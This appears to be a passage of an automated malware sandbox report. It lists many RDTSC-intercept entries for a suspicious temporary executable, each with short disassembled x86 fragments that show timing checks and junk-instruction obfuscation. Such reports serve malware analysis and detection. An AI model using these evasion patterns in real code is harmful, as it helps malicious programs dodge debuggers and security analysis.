                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7B4452 second address: 7B449F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAF7CBD5D3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FAF7CBD5D47h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push edi 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jns 00007FAF7CBD5D36h 0x0000001f popad 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FAF7CBD5D3Eh 0x0000002c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7A50CA second address: 7A50D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7A50D2 second address: 7A50D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D1B68 second address: 7D1B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D1B6C second address: 7D1B73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D2256 second address: 7D225A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D269D second address: 7D26A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D26A3 second address: 7D26A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D26A7 second address: 7D26B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAF7CBD5D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D2803 second address: 7D281F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FAF7C6A41B4h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7C931D second address: 7C9323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7C9323 second address: 7C9343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAF7C6A41B8h 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D3407 second address: 7D3413 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D3413 second address: 7D342E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41B7h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D342E second address: 7D3434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D35AC second address: 7D35B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D35B3 second address: 7D35B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D35B9 second address: 7D35C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D35C2 second address: 7D35C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D39F1 second address: 7D39FF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FAF7C6A41A8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D39FF second address: 7D3A04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D5D2A second address: 7D5D4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jc 00007FAF7C6A41A6h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FAF7C6A41ACh 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D5D4C second address: 7D5D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D5D50 second address: 7D5D66 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF7C6A41A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007FAF7C6A41AAh 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7A355F second address: 7A356A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7A356A second address: 7A356E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7A356E second address: 7A358B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D42h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7A358B second address: 7A3594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D918D second address: 7D9199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7D9199 second address: 7D919D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7DC4C8 second address: 7DC4D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7DC4D7 second address: 7DC4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7DC4DC second address: 7DC502 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FAF7CBD5D36h 0x00000009 jmp 00007FAF7CBD5D3Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jc 00007FAF7CBD5D36h 0x0000001f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7DC502 second address: 7DC506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7DC506 second address: 7DC50C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7DC50C second address: 7DC511 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7DC511 second address: 7DC536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FAF7CBD5D43h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7DC536 second address: 7DC53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7DFECF second address: 7DFED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7DFED6 second address: 7DFEF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FAF7C6A41BEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007FAF7C6A41A6h 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7DFEF7 second address: 7DFF01 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF7CBD5D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E024B second address: 7E0260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAF7C6A41A6h 0x0000000a popad 0x0000000b js 00007FAF7C6A41AAh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E0260 second address: 7E026A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF7CBD5D3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E026A second address: 7E0271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E06A6 second address: 7E06AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E23EA second address: 7E2406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E25A2 second address: 7E25BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E26A9 second address: 7E26B7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E26B7 second address: 7E26BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E26BB second address: 7E26BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E2C9C second address: 7E2CB3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAF7CBD5D3Ch 0x00000008 jnl 00007FAF7CBD5D36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E2DB8 second address: 7E2DCA instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E2DCA second address: 7E2DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E2DCE second address: 7E2DD4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E3196 second address: 7E31B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAF7CBD5D43h 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E384D second address: 7E3851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E54D9 second address: 7E54DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E54DD second address: 7E5551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FAF7C6A41B8h 0x0000000c jmp 00007FAF7C6A41B2h 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007FAF7C6A41B1h 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FAF7C6A41A8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 cmc 0x00000037 pop esi 0x00000038 push 00000000h 0x0000003a movsx edi, bx 0x0000003d xchg eax, ebx 0x0000003e jmp 00007FAF7C6A41AFh 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 jc 00007FAF7C6A41A8h 0x0000004c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E5F24 second address: 7E5F2E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E5F2E second address: 7E5F82 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FAF7C6A41A8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov si, 75ADh 0x0000002e push 00000000h 0x00000030 add edi, dword ptr [ebp+122D2163h] 0x00000036 xchg eax, ebx 0x00000037 push esi 0x00000038 pushad 0x00000039 jmp 00007FAF7C6A41ABh 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 popad 0x00000041 pop esi 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 pop edx 0x00000049 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E6B0D second address: 7E6B13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E7477 second address: 7E7484 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E7484 second address: 7E7520 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAF7CBD5D38h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FAF7CBD5D38h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov esi, edi 0x00000029 stc 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007FAF7CBD5D38h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 movzx esi, bx 0x00000049 push 00000000h 0x0000004b pushad 0x0000004c jmp 00007FAF7CBD5D40h 0x00000051 call 00007FAF7CBD5D45h 0x00000056 or bx, 3C7Eh 0x0000005b pop ebx 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FAF7CBD5D44h 0x00000065 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E7520 second address: 7E752B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FAF7C6A41A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E7FA2 second address: 7E7FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E7FA6 second address: 7E7FAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E7FAC second address: 7E7FB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FAF7CBD5D36h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E7FB6 second address: 7E7FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E8A20 second address: 7E8A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D45h 0x00000009 popad 0x0000000a pop eax 0x0000000b nop 0x0000000c or edi, dword ptr [ebp+122D36C6h] 0x00000012 push 00000000h 0x00000014 mov esi, dword ptr [ebp+124566ADh] 0x0000001a push 00000000h 0x0000001c mov edi, dword ptr [ebp+122D29DFh] 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 je 00007FAF7CBD5D36h 0x0000002c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E5CB7 second address: 7E5CBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E67D8 second address: 7E67DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E7245 second address: 7E7252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FAF7C6A41ACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E5CBD second address: 7E5CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7ED946 second address: 7ED9A1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FAF7C6A41A8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 sub dword ptr [ebp+122D27CFh], edi 0x0000002d push 00000000h 0x0000002f mov dword ptr [ebp+122D34EBh], edx 0x00000035 xchg eax, esi 0x00000036 ja 00007FAF7C6A41B2h 0x0000003c jnl 00007FAF7C6A41ACh 0x00000042 push eax 0x00000043 je 00007FAF7C6A41B0h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E5CC1 second address: 7E5CE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E7D84 second address: 7E7D8E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EFFA4 second address: 7EFFAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FAF7CBD5D36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EFFAF second address: 7EFFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 js 00007FAF7C6A41B4h 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FAF7C6A41A6h 0x00000016 rdtsc
